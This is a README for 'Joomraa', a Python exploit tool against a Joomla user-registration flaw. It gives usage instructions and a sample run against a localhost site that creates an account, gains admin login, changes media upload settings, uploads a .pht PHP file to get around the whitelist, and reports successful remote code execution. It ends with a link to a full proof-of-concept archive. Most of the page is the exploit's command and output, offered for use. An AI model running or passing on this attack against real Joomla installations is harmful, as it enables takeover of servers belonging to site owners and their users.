Source: https://github.com/XiphosResearch/exploits/tree/master/Joomraa While analysing the recent Joomla exploit in com_users:user.register we came across a problem with the upload whitelisting. They don't allow files containing SetHandler application/x-httpd-php Usage Choose the username, password and e-mail address to use and point it at the URL for your Joomla website. Use the -x and -s options to customise exploit behaviour, -s searches for the given string in the output after running the PHP file (specified in -x), an example is provided which proves remote code execution. $ ./joomraa.py -u hacker -p password -e hacker@example.com http://localhost:8080/joomla @@@ @@@@@@ @@@@@@ @@@@@@@@@@ @@@@@@@ @@@@@@ @@@@@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@@ @@@@@@@@ @@@@@@@@ @@@@@@@@ @@@ @@! @@! @@@ @@! @@@ @@! @@! @@! @@! @@@ @@! @@@ @@! @@@ @@! !@! !@! @!@ !@! @!@ !@! !@! !@! !@! @!@ !@! @!@ !@! @!@ !@ !!@ @!@ !@! @!@ !@! @!! !!@ @!@ @!@!!@! @!@!@!@! @!@!@!@! @!@ !!! !@! !!! !@! !!! !@! ! !@! !!@!@! !!!@!!!! !!!@!!!! !!! !!: !!: !!! !!: !!! !!: !!: !!: :!! !!: !!! !!: !!! !!: :!: :!: !:! :!: !:! :!: :!: :!: !:! :!: !:! :!: !:! :!: ::: : :: ::::: :: ::::: :: ::: :: :: ::: :: ::: :: ::: :: : ::: : : : : : : : : : : : : : : : : : ::: [-] Getting token [-] Creating user account [-] Getting token for admin login [-] Logging in to admin [+] Admin Login Success! [+] Getting media options [+] Setting media options [*] Uploading exploit.pht [*] Uploading exploit to: http://localhost:8080/joomla/images/OGBUHCF5F.pht [*] Calling exploit [$] Exploit Successful! [*] SUCCESS: http://localhost:8080/joomla Full Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40637.zip